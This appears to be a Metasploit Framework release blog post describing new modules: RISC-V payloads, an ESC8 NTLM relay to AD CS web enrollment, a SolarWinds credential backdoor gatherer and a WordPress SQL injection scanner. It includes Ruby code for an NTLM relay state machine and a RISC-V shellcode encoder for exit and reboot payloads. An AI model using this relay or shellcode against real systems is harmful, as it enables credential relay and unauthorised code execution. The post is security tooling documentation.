Last updated at Sat, 09 Nov 2024 03:29:20 GMT

RISC-V Support

This release of Metasploit Framework adds new payloads that target the RISC-V architecture (32-bit and 64-bit little-endian Linux). These payloads execute commands on compromised RISC-V hardware, letting Metasploit Framework and Metasploit Payloads be used in more environments.

SMB To HTTP(S) Relay

This new auxiliary module, written by Rapid7 contributors, targets ESC8, the AD CS attack path in which NTLM authentication is relayed to the certificate web enrollment endpoint. It is part of the recent Kerberos and Active Directory work covering multiple ESC attack paths, bringing these modern Active Directory attack workflows into Metasploit Framework.

It includes a modified SMB capture server that repackages the NTLM authentication it captures and forwards it to an NTLM-authenticating HTTP server. The authenticated HTTP client is then handed to the ESC8 module, which requests certificates on behalf of the relayed account and downloads them.

Python Exec Payload

This week's addition to the payloads catalog is a new Python payload, developed by zeroSteiner, that executes arbitrary OS commands. It is compatible with Python 2.7 and 3.4+.

New module content (10)

SolarWinds Web Help Desk Backdoor (CVE-2024-28987)

Authors: Michael Heinzl and Zach Hanley
Type: Auxiliary
Pull request: #19499 contributed by h4x-x0r
Path: gather/solarwinds_webhelpdesk_backdoor
AttackerKB reference: CVE-2024-28987

Description: This module exploits a backdoor (hardcoded credentials, CVE-2024-28987) in SolarWinds Web Help Desk <= v12.8.3 to retrieve all tickets from the system.

WordPress TI WooCommerce Wishlist SQL Injection (CVE-2024-43917)

Authors: Rafie Muhammad and Valentin Lobstein
Type: Auxiliary
Pull request: #19517 contributed by Chocapikk
Path: scanner/http/wp_ti_woocommerce_wishlist_sqli
AttackerKB reference: CVE-2024-43917

Description: This new auxiliary module exploits an unauthenticated SQL injection vulnerability in the TI WooCommerce Wishlist plugin for WordPress (versions <= 2.8.2). The injection is in the order parameter and can be used to dump usernames and their hashed passwords.

ESC8 Relay: SMB to HTTP(S)

Authors: Spencer McIntyre, bwatters-r7, and jhicks-r7
Type: Auxiliary
Pull request: #19404 contributed by bwatters-r7
Path: server/relay/esc8

Description: This is an implementation of the AD CS ESC8 attack path (NTLM relay to the certificate web enrollment endpoint). It includes a library that uses a modified SMB capture server to repackage and forward authentication from the SMB capture server to an NTLM-authenticating HTTP server. The authenticated HTTP client is then passed to the ESC8 module, which requests certificates and downloads them.
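The relay described in this entry and in the SMB To HTTP(S) Relay section above, as an added example that is not the Metasploit module's own code: a stripped-down Ruby state machine showing how the NTLM NEGOTIATE and AUTHENTICATE tokens captured from an SMB victim are re-wrapped into HTTP Authorization headers, and how the enrollment endpoint's CHALLENGE is unwrapped and passed back to the victim unchanged. The host ca.corp.example, the /certsrv/ path, the flag value, the server challenge and the stand-in endpoint are all constructed for an offline run; the real module goes on to use the authenticated client to request a certificate, which this example stops short of.

```ruby
require 'base64'

# NTLMSSP message layout (MS-NLMP): 8-byte "NTLMSSP\0" signature followed by a
# little-endian 32-bit MessageType: 1 = NEGOTIATE, 2 = CHALLENGE, 3 = AUTHENTICATE.
NEGOTIATE, CHALLENGE, AUTHENTICATE = 1, 2, 3
NEG_FLAGS = 0xe2088297 # a typical client flag set; illustrative only

def ntlm_message_type(token)
  sig, type = token.unpack('a8V')
  raise ArgumentError, 'not an NTLMSSP message' unless sig == "NTLMSSP\0"
  type
end

# CHALLENGE_MESSAGE: sig(8) type(4) TargetNameFields(8) NegotiateFlags(4) ServerChallenge(8)
def server_challenge(token)
  raise ArgumentError, 'not a CHALLENGE' unless ntlm_message_type(token) == CHALLENGE
  token.byteslice(24, 8)
end

# The relay: tokens captured from the SMB victim are wrapped into HTTP Authorization
# headers; the endpoint's CHALLENGE is unwrapped and returned to the victim byte-for-byte,
# so the victim computes its NTLMv2 response over the real server challenge.
class Esc8Relay
  def initialize(host, path = '/certsrv/') # hypothetical AD CS web enrollment URL
    @host, @path, @state = host, path, :idle
  end

  # Token taken from the victim's SMB SESSION_SETUP; returns the HTTP request to send.
  def smb_to_http(token)
    type = ntlm_message_type(token)
    @state = case [@state, type]
             when [:idle, NEGOTIATE] then :awaiting_challenge
             when [:challenge_relayed, AUTHENTICATE] then :awaiting_result
             else raise "unexpected NTLM type #{type} in state #{@state}"
             end
    # NTLM over HTTP binds the handshake to one TCP connection: keep it open.
    "GET #{@path} HTTP/1.1\r\nHost: #{@host}\r\n" \
      "Authorization: NTLM #{Base64.strict_encode64(token)}\r\nConnection: keep-alive\r\n\r\n"
  end

  # Status and headers the endpoint answered with; returns the CHALLENGE token to
  # relay back over SMB, or the outcome once the AUTHENTICATE has been relayed.
  def http_to_smb(status, headers)
    case @state
    when :awaiting_challenge
      www = headers['WWW-Authenticate'].to_s
      raise 'endpoint did not offer NTLM' unless status == 401 && www.start_with?('NTLM ')
      token = Base64.strict_decode64(www.split(' ', 2)[1])
      raise 'expected CHALLENGE' unless ntlm_message_type(token) == CHALLENGE
      @state = :challenge_relayed
      token
    when :awaiting_result
      @state = status == 401 ? :rejected : :authenticated
    else
      raise "no HTTP response expected in state #{@state}"
    end
  end
end

# --- constructed messages and a stand-in endpoint, so this runs offline ---
def build_negotiate
  ['NTLMSSP', NEGOTIATE, NEG_FLAGS, '', ''].pack('a8VVa8a8')
end

def build_challenge(server_challenge)
  ['NTLMSSP', CHALLENGE, '', NEG_FLAGS, server_challenge, ''].pack('a8Va8Va8a8')
end

def build_authenticate # only signature and type matter here; a real one carries the NTLMv2 response
  ['NTLMSSP', AUTHENTICATE].pack('a8V') + "\0" * 52
end

# Web enrollment stand-in: 401 + CHALLENGE on NEGOTIATE, then 200 if an AUTHENTICATE
# follows on the same connection. Returns a callable giving [status, headers].
def fake_endpoint(challenge)
  issued = false
  lambda do |request|
    token = Base64.strict_decode64(request[/^Authorization: NTLM (\S+)/, 1])
    if ntlm_message_type(token) == NEGOTIATE
      issued = true
      [401, { 'WWW-Authenticate' => "NTLM #{Base64.strict_encode64(build_challenge(challenge))}" }]
    else
      [issued ? 200 : 401, {}]
    end
  end
end

# One full relay: victim -> relay -> endpoint -> relay -> victim -> relay -> endpoint.
def simulate_relay
  challenge = [0x0123456789abcdef].pack('Q>') # constructed server challenge
  relay = Esc8Relay.new('ca.corp.example')
  endpoint = fake_endpoint(challenge)
  status, headers = endpoint.call(relay.smb_to_http(build_negotiate))
  relayed = relay.http_to_smb(status, headers) # goes back to the SMB victim
  status, headers = endpoint.call(relay.smb_to_http(build_authenticate))
  { outcome: relay.http_to_smb(status, headers), challenge_intact: server_challenge(relayed) == challenge }
end
```

The handshake survives relaying because the victim's NTLMv2 response is computed over the server challenge the relay passed through untouched, so the endpoint receives a valid response for an account it never spoke to directly. This only works when the enrollment endpoint accepts NTLM without Extended Protection for Authentication (channel binding to the TLS session), which is the ESC8 precondition and, together with disabling NTLM on the endpoint, its remediation.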

Multiple RISC-V payloads

Author: bcoles bcoles@gmail.com
Pull request: #19518 contributed by bcoles and modexp

Description: Adds support for RISC-V 32-bit and 64-bit little-endian payloads, including Linux Execute Command payloads and Linux Reboot payloads (useful for confirming code execution on a target):

  • nop/riscv64le/simple - 64 bit nops module
  • nop/riscv32le/simple - 32 bit nops module
  • payload/linux/riscv32le/exec - 32 bit Linux Execute Command
  • payload/linux/riscv32le/reboot - 32 bit Linux Reboot
  • payload/linux/riscv64le/exec - 64 bit Linux Execute Command
  • payload/linux/riscv64le/reboot - 64 bit Linux Reboot
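As an added illustration of what these little-endian RISC-V payloads are made of (this is not the code of the modules listed above): a minimal Ruby encoder for the two instruction formats a bare RISC-V Linux payload needs, producing the words of a nop sled, an exit(2) payload and a reboot(2) payload, plus a tiny interpreter that checks what lands in the syscall registers. Register numbers and instruction layouts are from the RISC-V ABI and ISA manual, syscall numbers from asm-generic/unistd.h and the reboot magic values from linux/reboot.h; the function names are this example's own.

```ruby
# Field layouts from the RISC-V ISA manual:
#   U-type (LUI):   imm[31:12] | rd | opcode 0x37
#   I-type (ADDI):  imm[11:0] | rs1 | funct3=0 | rd | opcode 0x13
#   ECALL:          0x00000073
OP_LUI, OP_IMM, ECALL = 0x37, 0x13, 0x00000073
NOP = 0x00000013 # addi x0, x0, 0, the canonical 32-bit nop
REG = { zero: 0, a0: 10, a1: 11, a2: 12, a3: 13, a7: 17 } # ABI names -> x-register numbers

def encode_addi(rd, rs1, imm)
  raise ArgumentError, "imm #{imm} outside signed 12-bit range" unless (-2048..2047).cover?(imm)
  ((imm & 0xfff) << 20) | (REG.fetch(rs1) << 15) | (REG.fetch(rd) << 7) | OP_IMM
end

def encode_lui(rd, imm20)
  ((imm20 & 0xfffff) << 12) | (REG.fetch(rd) << 7) | OP_LUI
end

# Materialise a 32-bit constant with LUI + ADDI. ADDI sign-extends its 12-bit
# immediate, so when bit 11 of the low part is set the LUI value is bumped by one.
def load_imm32(rd, value)
  value &= 0xffffffff
  lo = value & 0xfff
  lo -= 0x1000 if lo >= 0x800
  hi = ((value - lo) >> 12) & 0xfffff
  [encode_lui(rd, hi), encode_addi(rd, rd, lo)]
end

# Payload bytes: 32-bit words, little-endian, as riscv32le/riscv64le expect.
def assemble(words)
  words.pack('V*')
end

def nop_sled(count)
  assemble([NOP] * count)
end

# Syscall numbers on riscv32 and riscv64 both come from asm-generic/unistd.h.
SYS_EXIT, SYS_REBOOT = 93, 142
# Linux reboot magic values (linux/reboot.h).
REBOOT_MAGIC1, REBOOT_MAGIC2, REBOOT_CMD_RESTART = 0xfee1dead, 0x28121969, 0x01234567

def exit_payload(status)
  assemble([encode_addi(:a0, :zero, status), encode_addi(:a7, :zero, SYS_EXIT), ECALL])
end

# reboot(MAGIC1, MAGIC2, CMD_RESTART, NULL): the magic numbers need LUI+ADDI pairs.
def reboot_payload
  words = load_imm32(:a0, REBOOT_MAGIC1) + load_imm32(:a1, REBOOT_MAGIC2) +
          load_imm32(:a2, REBOOT_CMD_RESTART) +
          [encode_addi(:a3, :zero, 0), encode_addi(:a7, :zero, SYS_REBOOT), ECALL]
  assemble(words)
end

# Tiny rv32 interpreter for just LUI/ADDI/ECALL: decodes the emitted words and
# returns the syscall registers at the ECALL, to check the encodings above.
def run_until_ecall(bytes)
  regs = Array.new(32, 0)
  bytes.unpack('V*').each do |w|
    opcode, rd = w & 0x7f, (w >> 7) & 0x1f
    case opcode
    when OP_LUI then regs[rd] = w & 0xfffff000
    when OP_IMM
      imm = w >> 20
      imm -= 0x1000 if imm >= 0x800
      regs[rd] = (regs[(w >> 15) & 0x1f] + imm) & 0xffffffff
    when ECALL then return { a0: regs[10], a1: regs[11], a2: regs[12], a3: regs[13], a7: regs[17] }
    else raise "unsupported instruction #{format('%08x', w)}"
    end
    regs[0] = 0 # x0 is hard-wired to zero
  end
  nil
end

def hex_words(bytes)
  bytes.unpack('V*').map { |w| format('%08x', w) }
end
```

The same bytes serve both widths: on RV64, LUI sign-extends bit 31, so a0 holds 0xfffffffffee1dead rather than 0xfee1dead, but the kernel's reboot syscall takes its magic arguments as int and compares only the low 32 bits. An execute-command payload needs one more ingredient this example leaves out, a PC-relative address (AUIPC) for the command string passed to execve.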

Python Execute Command

Author: Spencer McIntyre
Type: Payload (Single)
Pull request: #19528 contributed by zeroSteiner
Path: python/exec

Description: Adds a new single-stage Python payload that executes an arbitrary OS command; it is compatible with Python 2.7 and 3.4+.

Enhancements and features (2)

  • #19529 from NtAlexio2 - This updates the pipe_dcerpc_auditor module to use the new pattern for handling port settings, which gives users greater control over their targeting.
  • #19573 from adfoster-r7 - Updates Metasploit to Ruby 3.2.5.

Bugs fixed (2)

  • #19550 from Mathiou04 - Fixes an issue where, with USER_AS_PASS enabled, the USERNAME was not attempted as the PASSWORD.
  • #19619 from smashery - This fixes a regression crash in the auxiliary/admin/kerberos/get_ticket module.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro.
